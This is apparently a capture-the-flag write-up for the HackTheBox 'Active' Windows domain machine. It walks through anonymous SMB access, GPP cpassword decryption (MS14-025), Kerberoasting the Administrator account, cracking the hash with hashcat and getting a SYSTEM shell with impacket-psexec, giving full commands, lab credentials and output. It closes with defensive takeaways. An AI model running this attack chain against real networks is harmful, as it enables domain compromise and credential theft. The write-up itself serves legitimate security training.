~/writeups/Active
Easy Windows Active Directory
Active.
Easy Windows Active Directory GPP / MS14-025 Kerberoasting HackTheBox
Easy Windows Active Directory machine covering two foundational AD attack techniques found in real-world engagements. Anonymous SMB access to a Replication share (a SYSVOL mirror) exposes a Groups.xml file containing a GPP-encrypted password (cpassword). Decrypting it with the publicly-known AES key gives domain credentials for SVC_TGS. That account can Kerberoast the Administrator SPN — the resulting TGS hash cracks in seconds, and impacket-psexec delivers a SYSTEM shell.
User Flag
bcc2c4eff3xxxxxxxxxxxxxxxxxxxxxx
Root Flag
f07d33f967xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan paints a clear DC picture. Domain is active.htb, OS is Windows Server 2008 R2 SP1. One notable absence: no port 5985 — WinRM is not enabled. evil-winrm is out; we'll need psexec or wmiexec once we have credentials.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.2.51 53/tcp open domain Windows DNS 88/tcp open kerberos-sec Windows KDC 389/tcp open ldap Active Directory (Domain: active.htb) 445/tcp open microsoft-ds Windows Server 2008 R2 SP1 SMB 135/tcp open msrpc 139/tcp open netbios-ssn 464/tcp open kpasswd5 593/tcp open ncacn_http RPC over HTTP 636/tcp open tcpwrapped LDAPS
no WinRM: Port 5985 is not open. evil-winrm will fail. Once we have admin credentials we'll use impacket-psexec over SMB instead.
env setup
$ echo "10.129.2.51 active.htb dc.active.htb" | sudo tee -a /etc/hosts $ export IP=10.129.2.51 $ export DOMAIN=active.htb
02SMB Enumeration — Anonymous Access to Replication

Null session (empty username/password) works against SMB. The share list reveals a non-default share called Replication with anonymous read access. In many older domain environments this is a mirror of SYSVOL — the share that holds Group Policy data for all machines in the domain.

nxc — null auth share enum
$ nxc smb $IP -u '' -p '' --shares ADMIN$ (no access) C$ (no access) IPC$ READ NETLOGON (no access) Replication READ SYSVOL (no access) Users (no access)

Connect and recursively download everything from the Replication share to inspect offline.

smbclient — recursive download
$ smbclient //$IP/Replication -N smb: \> cd active.htb smb: \active.htb\> recurse on smb: \active.htb\> prompt off smb: \active.htb\> mget *
finding: the Replication share mirrors SYSVOL — it contains the full Group Policy directory tree for the domain. When you see an unfamiliar share, always download everything and inspect offline.
03GPP Password Exposure — MS14-025

Among the downloaded files is a Group Policy Preferences XML file containing a cpassword field — an AES-256 encrypted password. Microsoft used this to push local account credentials via Group Policy, but critically they published the AES key in their own documentation. Any cpassword value is trivially decryptable.

Groups.xml — cpassword field
$ cat active.htb/Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml userName="active.htb\SVC_TGS" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
gpp-decrypt
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ GPPstillStandingStrong2k18
nxc — validate credentials
$ nxc smb $IP -u SVC_TGS -p 'GPPstillStandingStrong2k18' [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
credential: SVC_TGS:GPPstillStandingStrong2k18. MS14-025 (2014) patched the ability to create new GPP passwords, but files already in SYSVOL were never cleaned up — this is why the vulnerability still appears in real engagements years later.
04User Flag

With valid credentials the Users share is now readable. The user flag is on SVC_TGS's desktop.

smbclient — Users share
$ smbclient //$IP/Users -U 'SVC_TGS%GPPstillStandingStrong2k18' smb: \> cd SVC_TGS\Desktop smb: \SVC_TGS\Desktop\> get user.txt bcc2c4eff3xxxxxxxxxxxxxxxxxxxxxx
05Kerberoasting — Administrator SPN

Kerberoasting abuses a Kerberos design feature: any authenticated domain user can request a TGS ticket for any SPN. The ticket is encrypted with the service account's NT hash. By requesting it and cracking offline, you never interact with the account directly and trigger no lockouts.

The account name SVC_TGS (Service Account Ticket Granting Service) is a hint that Kerberoasting is the intended path.

GetUserSPNs — enumerate + request TGS
$ impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP -request ServicePrincipalName Name MemberOf active/CIFS:445 Administrator CN=Group Policy Creator Owners,... $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9df8f0b1...d44e8d
finding: the domain Administrator account has an SPN registered (active/CIFS:445). This is unusual — privileged accounts with SPNs are prime Kerberoast targets. The hash type is etype 23 (RC4), the most crackable variant.
hashcat — crack TGS hash
$ hashcat -m 13100 admin_hash.txt /usr/share/wordlists/rockyou.txt $krb5tgs$23$*Administrator$ACTIVE.HTB$...:Ticketmaster1968
credential: Administrator:Ticketmaster1968 — cracked in ~4 seconds. Ticketmaster1968 is in rockyou.txt. Service accounts (especially privileged ones) must have long random passwords; gMSAs rotate them automatically.
06SYSTEM — impacket-psexec

No WinRM means no evil-winrm. impacket-psexec authenticates over SMB, uploads a service binary to ADMIN$, and spawns a SYSTEM shell — because Windows services run as NT AUTHORITY\SYSTEM by default.

psexec → SYSTEM
$ impacket-psexec administrator:Ticketmaster1968@$IP [*] Found writable share ADMIN$ [*] Uploading file MCFRbGkM.exe [*] Creating service srDK on 10.129.2.51 Microsoft Windows [Version 6.1.7601] C:\Windows\system32> whoami nt authority\system
root flag
C:\> cd Users\Administrator\Desktop C:\Users\Administrator\Desktop> type root.txt f07d33f967xxxxxxxxxxxxxxxxxxxxxx
encoding errors: cosmetic only — Server 2008 uses a different code page. Commands still execute correctly.
07Full Attack Chain
attack chain summary
Nmap → DC identified, domain: active.htb, Server 2008 R2, no WinRM │ ▼ SMB null auth → Replication share readable anonymously (Replication = SYSVOL mirror with Group Policy data) │ ▼ Groups.xml → cpassword field for SVC_TGS gpp-decrypt → SVC_TGS:GPPstillStandingStrong2k18 │ ▼ Users share now readable → user.txt ✓ │ ▼ GetUserSPNs → Administrator has SPN (active/CIFS:445) TGS ticket requested → Kerberos RC4 hash extracted │ ▼ hashcat -m 13100 (4 seconds) → Administrator:Ticketmaster1968 │ ▼ impacket-psexec → SYSTEM shell → root.txt ✓
key takeaways:
· GPP passwords (MS14-025) used a published AES key — any cpassword in SYSVOL is fully decryptable
· Even post-patch, old Groups.xml files left in SYSVOL remain exploitable indefinitely
· Kerberoasting is noise-free — TGS requests look like normal Kerberos traffic
· Privileged accounts (especially Administrator) must never have SPNs unless absolutely required
· Service account passwords should be 30+ random characters; use gMSAs for auto-rotation
· No WinRM → psexec/wmiexec/smbexec over SMB are the alternatives
← all writeups